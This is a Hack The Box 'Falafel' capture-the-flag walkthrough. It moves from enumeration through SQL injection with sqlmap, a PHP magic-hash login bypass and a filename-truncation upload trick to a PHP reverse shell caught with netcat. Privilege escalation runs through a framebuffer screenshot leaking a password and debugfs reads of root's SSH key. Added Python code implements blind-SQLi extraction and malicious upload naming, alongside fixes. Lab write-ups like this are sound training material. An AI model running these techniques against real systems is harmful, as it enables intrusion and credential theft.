HTB – Falafel

Today we are going to solve another CTF challenge, "Falafel", which is available online for those who want to improve their penetration testing and black-box testing skills. Falafel is a retired vulnerable lab from Hack The Box, which offers a collection of vulnerable labs as challenges, from beginner to expert level, so you can practise online according to your experience.

Level: Hard

Task: find user.txt & root.txt file on the victim’s machine

Since these labs are hosted online they have a static IP, so let's begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV
Starting Nmap 7.70 ( ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for
Host is up (0.030s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds

Browsing to the target IP brings up the login page shown below.


The single disallowed entry in robots.txt hints at .txt files, so let's brute-force for .txt files that might give some juicy information:

root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60
* Wfuzz 2.1.5 - The Web Bruteforcer                      *

Total requests: 207643

ID	Response   Lines      Word         Chars          Request    

01347:  C=200      1 L	       4 W	     30 Ch	  "robots"
06064:  C=200     17 L	     120 W	    804 Ch	  "cyberlaw"

Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926

Let’s check cyberlaw.txt

Reading this message, I conclude that there is an admin account, that the site has a serious security issue, and that an attacker can take over the website through the image upload feature. There is also a hint about the URL filter.

The login form can also be fuzzed for valid usernames. Every unknown name gets the same 657-word response, so a second run that hides that word count (--hw 657) leaves only the names the application answers differently:

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle"

* Wfuzz 2.3.3 - The Web Fuzzer *

Total requests: 8607

ID Response Lines Word Chars Payload 

000003: C=200 102 L 657 W 7074 Ch "Aaron"
000004: C=200 102 L 657 W 7074 Ch "Aartjan"
000005: C=200 102 L 657 W 7074 Ch "Abagael"
000006: C=200 102 L 657 W 7074 Ch "Abagail"
000007: C=200 102 L 657 W 7074 Ch "Abahri"
Finishing pending requests...

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle"

* Wfuzz 2.3.3 - The Web Fuzzer                         *

Total requests: 8607

ID   Response   Lines      Word         Chars          Payload    

000065:  C=200    102 L	     659 W	   7091 Ch	  "Admin"
001488:  C=200    102 L	     659 W	   7091 Ch	  "Chris"

Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511

The next thing to try is a SQL injection test. Insert the following string as the username:

and press the login button with a random password. The page answers "Wrong identification: admin", but we never typed "admin" into the form: the error message echoes whichever row our manipulated query selected, so the username field is injectable.
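The behaviour just described, as an added example that is not the box's own login_logic.php: the real application is PHP talking to MySQL, but the string-building bug and its fix look the same against an in-memory SQLite table. The users rows are a constructed copy of what sqlmap dumps further down; the "Try again.." message for unknown users is assumed.

```python
"""Login check with an injectable username and the error-message oracle it creates."""
import hashlib
import hmac
import sqlite3

USERS = [  # constructed from the dumped `users` table
    (1, "admin", "admin", "0e462096931906507119562988736854"),
    (2, "normal", "chris", "d4ee02a22fc872e36d9e3751ba72ddc8"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (ID INTEGER, role TEXT, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return db


def login_vulnerable(db, username, password):
    """The username is concatenated into the query, so it controls the WHERE clause."""
    query = f"SELECT username, password FROM users WHERE username = '{username}'"
    row = db.execute(query).fetchone()
    if row is None:
        return "Try again.."
    stored_user, stored_hash = row
    if hashlib.md5(password.encode()).hexdigest() == stored_hash:
        return f"Welcome {stored_user}"
    # The message echoes the username of the row the query selected,
    # not the one that was typed in: that is the oracle spotted above.
    return f"Wrong identification: {stored_user}"


def oracle(db, condition):
    """True when `condition` holds for the admin row (boolean-based blind)."""
    payload = f"admin' AND ({condition}) -- "
    return login_vulnerable(db, payload, "x") == "Wrong identification: admin"


def extract_admin_hash(db, length=32):
    """Recover admin's MD5 one hex digit at a time, the way sqlmap --string does."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in "0123456789abcdef":
            if oracle(db, f"substr(password, {pos}, 1) = '{c}'"):
                recovered += c
                break
        else:
            raise RuntimeError(f"no digit matched at position {pos}")
    return recovered


def login_fixed(db, username, password):
    """Parameterised query plus constant-time compare; injection text is just an unknown name."""
    row = db.execute(
        "SELECT username, password FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return "Try again.."
    stored_user, stored_hash = row
    # MD5 is kept only to mirror the box; a real fix also moves to bcrypt/argon2.
    if hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored_hash):
        return f"Welcome {stored_user}"
    return "Wrong identification"  # never echo the selected username


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' OR 1=1 -- ", "x"))   # Wrong identification: admin
    print(extract_admin_hash(db))
    print(login_fixed(db, "' OR 1=1 -- ", "x"))        # Try again..
```

`extract_admin_hash` needs at most 512 requests for a 32-character digest, which is why sqlmap's `--string "Wrong identification"` below is enough to dump the table: the only signal it needs is whether the echoed name changes.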


Exploiting Web Application Vulnerabilities

Next we hand the injection to sqlmap, giving "Wrong identification" as the string that marks a true response (--string) so it can drive a boolean-based blind attack through the login form and enumerate the falafel database.

c:\SQLMAP>python -u --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch

[*] starting @ 14:59:45 /2019-04-02/

back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
| users |

[*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python -u --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch

[*] starting @ 15:01:18 /2019-04-02/

[15:01:18] [INFO] testing connection to the target URL
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
| ID | role | username | password |
| 1 | admin | admin | 0e462096931906507119562988736854 |
| 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 |

[*] ending @ 15:01:19 /2019-04-02/

Notice that the admin password hash starts with "0e" and the rest of its 32 hex characters are all decimal digits. I did not know much about this kind of hash, so a Google search led to the "magic hashes" list.

The point is PHP's loose comparison: when both sides of == are numeric strings, PHP compares them as numbers, and "0e" followed by digits is 0 × 10^N, i.e. 0. Any password whose MD5 digest also has the 0e<digits> form (the classic example is 240610708, whose MD5 is 0e462097431906509019562988775104) therefore compares equal to the stored hash; it does not need to be the same digest.

With that credential we log in to the admin dashboard and move to the upload option.

Here we try to upload a PHP file named shell.php, but it fails with a "Bad extension" error as shown.

So we rename it to shell.php.png and try again.

Yes! The file with the .png extension is uploaded successfully into /var/www/html/uploads, so the filter only looks at the final extension. Apache will not execute a .png file as PHP, though, so we still need the file to end up with a .php name on disk.

Spawning Shell

Let's create a PHP payload to upload to the web site.

As shown in the image, the PHP file is uploaded successfully into /var/www/html/uploads.


Trying very long file names, I noticed that the web app truncates the name saved on disk to a maximum of 236 characters, while the extension check runs on the full name. So we build a 240-character file name whose last 8 characters are ".php.png": the check sees .png and accepts it, the truncation to 236 characters drops the trailing ".png", and the file lands on disk with a ".php" extension.
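The name-crafting logic, as an added example rather than the box's upload.php. The two "server" functions model what was observed above (check the full name, store the first 236 characters); the allow-list of image extensions is an assumption, since only .png is confirmed, and `safe_store_name` is the hardened order of operations.

```python
"""Craft an upload name that passes the extension check but is stored as .php."""
import os
import secrets

MAX_SAVED = 236                      # truncation length observed on the box
ALLOWED = {".png", ".jpg", ".gif"}   # assumed allow-list; only .png confirmed


def extension_of(name: str) -> str:
    return os.path.splitext(name)[1].lower()


def server_check(name: str) -> bool:
    """Vulnerable order, step 1: validate the name exactly as submitted."""
    return extension_of(name) in ALLOWED


def server_saved_name(name: str) -> str:
    """Vulnerable order, step 2: store under the name cut to MAX_SAVED characters."""
    return name[:MAX_SAVED]


def craft_name(inner=".php", outer=".png", limit=MAX_SAVED, stem="shell", pad="o"):
    """Pad so that exactly `limit` characters end with `inner`; `outer` falls past the cut."""
    body_len = limit - len(inner)
    if body_len < len(stem):
        raise ValueError("limit too small for stem plus inner extension")
    return stem + pad * (body_len - len(stem)) + inner + outer


def safe_store_name(name: str):
    """Hardened: decide on the name that will actually hit the disk, and never keep
    the client's name at all (random stem, validated extension)."""
    ext = extension_of(name[:MAX_SAVED])
    if ext not in ALLOWED:
        return None
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    name = craft_name()
    print(len(name), name[-12:])
    print("check passes:", server_check(name))
    print("stored as:", server_saved_name(name)[-8:])
    print("hardened:", safe_store_name(name))
```

Any byte limit that is applied after validation (filesystem NAME_MAX, a database column width, a path prefix added by the application) creates the same gap; the fix is to validate the name that will actually be written, or better, to generate it server-side.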

Sample filename:


Let's prepare a PHP reverse shell with a very long file name and host it with Python's SimpleHTTPServer; the upload form fetches the image by URL, so the box requests it from our listener:

root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ... - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -

Triggering the reverse shell via curl:

root@kali:~/htb/falafel# curl ""

Netcat listener receiving the reverse shell connection:

root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( )
Ncat: Listening on :::443
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00
yossi tty1 Mon00 40:59m 0.15s 0.09s -bash
moshe pts/0 15:21 1:52m 0.00s 0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')" 

The w output in the banner (and /etc/passwd) shows two system users, yossi and moshe. First let's look at the web root:

www-data@falafel:/$ cd /var/www/html
cd /var/www/html
www-data@falafel:/var/www/html$ ls
assets cyberlaw.txt images login_logic.php style.php
authorized.php footer.php index.php logout.php upload.php
connection.php header.php js profile.php uploads
css icon.png login.php robots.txt
www-data@falafel:/var/www/html$ cat connection.php 
cat connection.php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
// Check connection
if (mysqli_connect_errno())
echo "Failed to connect to MySQL: " . mysqli_connect_error();

This is the web application's database configuration: the MySQL username is moshe and the password is falafelIsReallyTasty. Reused credentials are worth trying against SSH.

With these credentials we SSH in as moshe, and after logging in we find user.txt in /home/moshe.

PS C:\Users\jacco> ssh moshe@
moshe@'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

* Documentation:
* Management:
* Support:

0 packages can be updated.
0 updates are security updates.

Last login: Tue Apr 2 15:21:50 2019 from
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
moshe@falafel:~$ cat user.txt

Enumerating further, we checked the groups of user moshe and found that moshe is a member of the video group. Membership of video grants read access to the framebuffer device files (/dev/fb*), and /dev/fb0 holds whatever is currently drawn on the physical console. From the w output above we know yossi is logged in on tty1, so a dump of the framebuffer is effectively a screenshot of his session, and a local user in this group can use it to pick up information that leads to privilege escalation.

Let's capture the framebuffer by reading /dev/fb0 with cat and saving the raw data in /tmp as screen.raw.

Now we have the raw capture in /tmp, we need to convert it to a standard image format such as .png, but first we need the framebuffer's dimensions; the following command prints them:

Now the following command converts the raw data into a .png image:

Opening screen.png gives the image below, which shows the password MoshePlzStopHackingMe! for user yossi.
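The conversion step, as an added example with only the Python standard library (not the tool the writeup used). It assumes the usual Linux framebuffer layout: 32 bpp pixels stored B, G, R, X, or 16 bpp RGB565, with the geometry taken from /sys/class/graphics/fb0 (virtual_size, bits_per_pixel, stride). The 2x2 sample buffer is constructed.

```python
"""Turn a raw /dev/fb0 dump into a PNG, no PIL or ImageMagick needed."""
import struct
import sys
import zlib

# Constructed 2x2 32-bpp sample: red, green / blue, white (B,G,R,X per pixel).
SAMPLE_RAW = (b"\x00\x00\xff\x00" + b"\x00\xff\x00\x00"
              + b"\xff\x00\x00\x00" + b"\xff\xff\xff\x00")


def parse_virtual_size(text: str):
    """/sys/class/graphics/fb0/virtual_size holds 'WIDTH,HEIGHT\\n'."""
    w, h = text.strip().split(",")
    return int(w), int(h)


def fb_to_rgb_rows(raw: bytes, width: int, height: int, bpp: int = 32, stride: int = 0):
    """Decode a framebuffer dump into a list of RGB scanlines (3 bytes per pixel)."""
    bytes_pp = bpp // 8
    stride = stride or width * bytes_pp       # stride may include padding
    if len(raw) < stride * height:
        raise ValueError(f"need {stride * height} bytes, got {len(raw)}")
    rows = []
    for y in range(height):
        line = raw[y * stride : y * stride + width * bytes_pp]
        out = bytearray(width * 3)
        if bpp == 32:                          # B,G,R,X -> R,G,B
            out[0::3] = line[2::4]
            out[1::3] = line[1::4]
            out[2::3] = line[0::4]
        elif bpp == 16:                        # RGB565, little-endian
            for i, v in enumerate(struct.unpack(f"<{width}H", line)):
                out[3 * i] = (v >> 11) << 3
                out[3 * i + 1] = ((v >> 5) & 0x3F) << 2
                out[3 * i + 2] = (v & 0x1F) << 3
        else:
            raise NotImplementedError(f"{bpp} bpp not handled")
        rows.append(bytes(out))
    return rows


def _chunk(tag: bytes, data: bytes) -> bytes:
    return (struct.pack(">I", len(data)) + tag + data
            + struct.pack(">I", zlib.crc32(tag + data) & 0xFFFFFFFF))


def encode_png(rows, width: int, height: int) -> bytes:
    """Minimal 8-bit RGB PNG: one IDAT, filter type 0 on every scanline."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    body = b"".join(b"\x00" + row for row in rows)
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(body, 9)) + _chunk(b"IEND", b""))


def png_dimensions(png: bytes):
    """Read width and height back out of the IHDR chunk."""
    return struct.unpack(">II", png[16:24])


def convert_capture(raw_path, out_path, sysfs="/sys/class/graphics/fb0"):
    """Run on the box: geometry from sysfs, pixels from the cat'd dump."""
    with open(f"{sysfs}/virtual_size") as f:
        width, height = parse_virtual_size(f.read())
    with open(f"{sysfs}/bits_per_pixel") as f:
        bpp = int(f.read())
    with open(f"{sysfs}/stride") as f:
        stride = int(f.read())
    with open(raw_path, "rb") as f:
        raw = f.read()
    with open(out_path, "wb") as f:
        f.write(encode_png(fb_to_rgb_rows(raw, width, height, bpp, stride), width, height))


if __name__ == "__main__":
    if len(sys.argv) == 3:
        convert_capture(sys.argv[1], sys.argv[2])   # e.g. /tmp/screen.raw /tmp/screen.png
    else:
        png = encode_png(fb_to_rgb_rows(SAMPLE_RAW, 2, 2), 2, 2)
        print("sample PNG:", png_dimensions(png), len(png), "bytes")
```

If the colours come out swapped, the framebuffer is exposing a different channel order; /sys/class/graphics/fb0/bits_per_pixel and the `fbset` output tell you which layout to decode.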

With the password we just captured we SSH in as yossi. yossi is a member of the disk group, which gives read access to the raw block devices, so debugfs can read the filesystem on /dev/sda1 directly and bypass the permissions on /root. That is enough to read root's SSH private key and root.txt:

PS C:\Users\jacco> ssh yossi@
yossi@'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:
 * Management:
 * Support:

0 packages can be updated.
0 updates are security updates.

Last login: Tue Apr  2 15:16:20 2019 from
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
debugfs:  cat /root/root.txt
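Both escalations on this box (video for the framebuffer, disk for debugfs) come down to one question: which users can open a device node for reading. The check below, an added example and not something the writeup ran, answers it from /etc/passwd (primary group), /etc/group (supplementary members) and `ls -l` output for the device nodes. All three inputs are constructed to match the box.

```python
"""Who can read /dev/fb0 and /dev/sda1, computed from group membership and device modes."""

GROUP_TEXT = """\
root:x:0:
adm:x:4:yossi
disk:x:6:yossi
video:x:44:moshe
yossi:x:1000:
moshe:x:1001:
"""

PASSWD_TEXT = """\
root:x:0:0:root:/root:/bin/bash
yossi:x:1000:1000:yossi:/home/yossi:/bin/bash
moshe:x:1001:1001:moshe:/home/moshe:/bin/sh
"""

LS_TEXT = """\
crw-rw---- 1 root video 29, 0 Apr  2 10:00 /dev/fb0
brw-rw---- 1 root disk   8, 1 Apr  2 10:00 /dev/sda1
"""

WHY = {
    "/dev/fb": "read = screenshot of the physical console (video group)",
    "/dev/sd": "read = whole filesystem via debugfs, root's files included (disk group)",
}


def parse_group(text):
    """group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, _, gid, members = line.split(":")
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def user_groups(passwd_text, group_text):
    """user -> set of group names: primary gid from passwd plus supplementary from group."""
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _) in groups.items()}
    result = {}
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        user, _, _, gid, *_ = line.split(":")
        result[user] = {gid_to_name.get(int(gid), gid)}
    for name, (_, members) in groups.items():
        for m in members:
            result.setdefault(m, set()).add(name)
    return result


def device_readers(ls_text, memberships):
    """device path -> sorted users who can open it for reading (owner/group/other r bits)."""
    readers = {}
    for line in ls_text.splitlines():
        if not line.strip():
            continue
        parts = line.split()
        mode, owner, group, path = parts[0], parts[2], parts[3], parts[-1]
        can = set()
        for user, groups in memberships.items():
            if user == owner and mode[1] == "r":
                can.add(user)
            elif group in groups and mode[4] == "r":
                can.add(user)
            elif mode[7] == "r":
                can.add(user)
        readers[path] = sorted(can)
    return readers


def report(ls_text=LS_TEXT, passwd_text=PASSWD_TEXT, group_text=GROUP_TEXT):
    """List of (device, readers, consequence) tuples, in ls order."""
    members = user_groups(passwd_text, group_text)
    out = []
    for path, users in device_readers(ls_text, members).items():
        why = next((v for k, v in WHY.items() if path.startswith(k)), "")
        out.append((path, users, why))
    return out


if __name__ == "__main__":
    for path, users, why in report():
        print(f"{path}: {', '.join(users)}  [{why}]")
```

On a live host, feed it `cat /etc/passwd`, `cat /etc/group` and `ls -l /dev/fb* /dev/sd*`; any non-root name beside /dev/sd* or /dev/fb* is the finding, since the disk group is root-equivalent and the video group leaks whatever is on the console.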